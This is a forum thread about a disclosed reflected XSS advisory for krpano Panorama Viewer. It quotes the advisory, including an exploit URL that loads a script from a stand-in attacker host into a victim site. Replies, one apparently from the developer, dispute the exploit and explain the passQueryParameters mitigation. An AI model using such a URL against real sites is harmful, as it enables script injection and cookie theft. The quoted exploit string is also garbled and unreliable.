XSS in krpano Panorama Viewer

  • Hi there,

    I'm dealing with several large corporate clients who are rather obsessive about security and penetration testing. They are apprehensive about creating tours because of potential threats and vulnerabilities which could be created by adding a tour to their server and website.

    I came across this https://seclists.org/fulldisclosure/2020/Oct/7 which details an exploit titled: XSS in krpano Panorama Viewer
    Can anyone provide any more information about this and how I might deal with this if it comes up when dealing with Krpano security issues? I need to have an educated response if I am asked about it so I would really appreciate some info.
    Thank you,

    Details below:

    *XSS in **krpano Panorama Viewer *
    CVSS Severity: *Medium*
    CVSS Score: *6.1*
    CVSS Vector:
    CVSS:3.0/AV:N/AC:L/PRCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N:N/UI:R/S:C/C:L/I:L/A:N
    <https://www.first.org/cvss/calculato…S:C/C:L/I:L/A:N>

    *Description*
    krpano Panorama Viewer <=1.20.8 is vulnerable to a Reflected Cross-Site
    Scripting (XSS) vulnerability caused by improper validation of user
    supplied input when loading remote js and XML files in the default
    installation (krpano.html).

    *Impact*
    A remote attacker could exploit this vulnerability using a specially
    crafted URL to execute a script in a victim's Web browser within the
    security context of the hosting Web site, once the URL is clicked or
    visited. An attacker could use this vulnerability to steal the victim's
    cookie-based authentication credentials, force malware execution, user
    redirection and others.

    *Steps to Reproduce*
    Exploit example, from documentation tutorials:
    http://VICTIM_SITE/krpano.html?html5=only&preview.type=grid()&plugin[test].url=[align=center&plugin[test].onclick=dosomething]https://ATTACKER_SITE/labs/krpano/krpano.js&plugin[test].align=center&plugin[test].onclick=dosomething[/align](hello,plugin)&onstart=showlog();

    *Fix*
    Block remote load of js and XML files. Contact the vendor.

  • First.. the *Steps to Reproduce* exploit example is messed up and not correct.

    you could inject a js plugin by url if passQueryParameters is true (the default is false)
    https://krpano.com/docu/html/#passQueryParameters

    but this working crossdomain is unlikely...
    even if so, this should be configurable using security / CORS
    https://krpano.com/docu/xml/#security

    My guess is this is a bogus alert

  • Hi,

    this is known and is about the 'passQueryParameters' setting:
    https://krpano.com/docu/html/#passQueryParameters

    When it is enabled any kind of code can be passed to the viewer, that is what it is made for.
    When disabled, nothing can be injected of course.

    But to improve that feature and to make it more safe, in the next release (version 1.21) the passQueryParameters setting then also allows to set a 'whitelist' of variables that can be passed.

    E.g. this way:

    Code
    embedpano({..., passQueryParameters:"startscene,startlookat"});

    Then only the 'startscene' and 'startlookat' parameters can be passed and all others will be ignored.

    When XSS is an actual problem in your usage case, make sure that passQueryParameters is set to false.
    And if you need to pass parameters via the url, then this would need to be done manually (use JS code to parse the query string and pass the custom parameters via the krpano JS API, I can make an example if required).

    Best regards,
    Klaus

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!